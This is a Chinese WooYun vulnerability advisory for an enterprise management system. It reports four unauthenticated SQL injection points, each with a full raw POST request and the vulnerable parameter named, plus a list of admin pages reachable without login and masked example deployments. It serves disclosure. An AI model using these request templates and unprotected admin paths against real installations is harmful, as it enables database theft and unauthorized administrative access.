当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0145232

漏洞标题:某企业管理系统四处SQL注入&多处系统越权

相关厂商:南京酷软软件有限公司

漏洞作者: 路人甲

提交时间:2015-10-10 11:29

修复时间:2015-11-24 11:30

公开时间:2015-11-24 11:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-11-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

rt

详细说明:

存在问题:4处SQL注入&系统多处越权(都无需登录)
第一处注入:

POST /login.aspx HTTP/1.1
Content-Length: 330
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
loginSubmit=&ckbIsSave=on&password=g00dPa%24%24w0rD&randomData=&signedData=&txt_verify=g00dPa%24%24w0rD&username=admin&__VIEWSTATE=/wEPDwUKLTg1Mjc0MDQzNmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFCWNrYklzU2F2ZWvEIdmbjPScY/cv4tJUXwzvI4cqqgA7uf89XFgMLZrY&__VIEWSTATEGENERATOR=C2EE9ABB


参数username
第二处注入:

POST /admin/glassmanager.aspx?ModelType=edit&page=1&PID=40 HTTP/1.1
Content-Length: 742
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
btnSearch=%e6%9f%a5%e8%af%a2&hidGrainID=40&txtGlasscode=%e5%8d%95%e9%9d%a2%e6%9c%a8%e6%a0%bc%e4%b8%80%e9%9d%a2%e7%99%bd%e7%8e%bb%e4%b8%80%e9%9d%a2%e5%b8%83%e7%ba%b9&txtGlassCodeForSearch=123&txtGlassName=40&txtGlassNameForSearch=ocljxusc&txtGlassprice=0&__EVENTVALIDATION=/wEdAAnKjHjs2vZ0ShC9zkxI0y4pW4pIN1KIEEsGHukofKCPKC8Au989bZBKED75joowesJSc2ZfrrLnksUmxqYJhYUi/f7hXxuj%2b9RdyEo8/nBf7eFPbBA2nrvZZ4n1DcerbfyIoPAi2xR6UPghNedlm6QFjtTdVzRZn7DFyWrI8V/OY2i3LqZOTKDGsjhJxkmxGp3YmfZmy9iDaVXQJLmwxxmBmae%2bTZLodyGOGWayPROPQQ%3d%3d&__VIEWSTATE=/wEPDwUKLTg4ODI0MDA4MQ9kFgICAw9kFgICAw8PFgIeBFRleHQFBuabtOaWsGRkZKbZg3eBuE8TxE7glDEEswRszq1lBWF0%2bHnGfQYZ%2bfAE&__VIEWSTATEGENERATOR=61268597


参数txtGlassNameForSearch 和 txtGlassCodeForSearch
第三处注入:

POST /admin/function/functionmanage.aspx HTTP/1.1
Content-Length: 553
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
ButAddFunction=%e6%b7%bb%e5%8a%a0&hidFunctionID=&TextFunctioncode=1&TextFunctionName=qeksviyy&TextFunctionpath=1&__EVENTVALIDATION=/wEdAAYwN3zyZaSJTHn8Ah/SC99I%2bLDo9dAznYnoFSF/78GxrPudp1MFazkgrxYIHSRoS4WM6vkbVh5TFLI8yCGtM2QBufd%2b2kIoS6kOXl%2blwxtK1NN8MV13sGeMpCG0koNNyNDuphDsjuVlO1wXx3SFbjr/Lks0UBPjPRPDSa8BVmo8Cw%3d%3d&__VIEWSTATE=/wEPDwUKLTE0NTk4NzI2MQ9kFgICAw9kFgYCBw8PFgIeB1Zpc2libGVoZGQCCQ8PFgIfAGhkZAINDxYCHgtfIUl0ZW1Db3VudGZkZPipjuIJPjUXAvu9jJCh2U3OEQzJDlv5sIyr/YQ7vkQn&__VIEWSTATEGENERATOR=4F298C76


参数TextFunctioncode
第四处注入:

POST /admin/colormanager.aspx?page=2 HTTP/1.1
Content-Length: 458
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: **.**.**.**:88/
Cookie: ASP.NET_SessionId=l551vxb0mubxov4s1y4rhcke; KrERPVerifyCode=TWAU; ASPSESSIONIDQCBAATAB=AIBIPCMBJEPABDLHFABCCCMM; HMACCOUNT=302D8848DC548312; Hm_lvt_489957c212e14340592fb2e4921b2f1d=1444125195; Hm_lpvt_489957c212e14340592fb2e4921b2f1d=1444125195
Host: **.**.**.**:88
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
BtnSeasrch=%e6%9f%a5%e8%af%a2&hidGrainID=0&txtCode=1&txtName=imjtmjdm&__EVENTVALIDATION=/wEdAAaOTLJrE1GkP3p9NL%2bgg%2blJozoJZpuXxkpOVJKRbHyuHoVrfPTZCZCdgWOPfArF%2bOv9/uFfG6P71F3ISjz%2bcF/tZRy0t362Wd2hZI98BfBb/2i3LqZOTKDGsjhJxkmxGp2NkRG0i6Gt/nSjTU0ov%2bJK4bHomrKhYXFOuwfglto8CA%3d%3d&__VIEWSTATE=/wEPDwUKMTk4MzU1NTA4NWRkglpP/rm817U8YnqbLrVrtnV9Fpc/WrQXbpNXW35owQM%3d&__VIEWSTATEGENERATOR=C550A4E8


参数txtCode和txtName
系统多处越权:

/admin/colormanager.aspx
/admin/cad/cadmodelrelation.aspx
/admin/cad/cadbaserelationship.aspx
/admin/flash/resourcemanager.aspx
/admin/flash/scenecatatorymanager2.aspx
/admin/flashmanage.aspx
不一一举例了。

漏洞证明:

4处SQL注入:

aaaaaaaaaaaaaaa11111111111111111111.jpg


aaaaaaaaaaaaaaaaaa22222222222222222222.jpg


aaaaaaaaaaaaaaaaaaa333333333333333333.jpg


aaaaaaaaaaaaaaaaaa4444444444444444444444444.jpg


aaaaaaaaaaaaaaaaaaa555555555555555555555.jpg


系统多处越权访问:

aaaaaaaaaaaaaaaa666666666666666666666666.jpg


aaaaaaaaaaaaaaaa7777777777777777777.jpg


aaaaaaaaaaaaaaa8888888888888888.jpg


案例:

**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:8088/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx
**.**.**.**:88/login.aspx

修复方案:

联系厂商

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝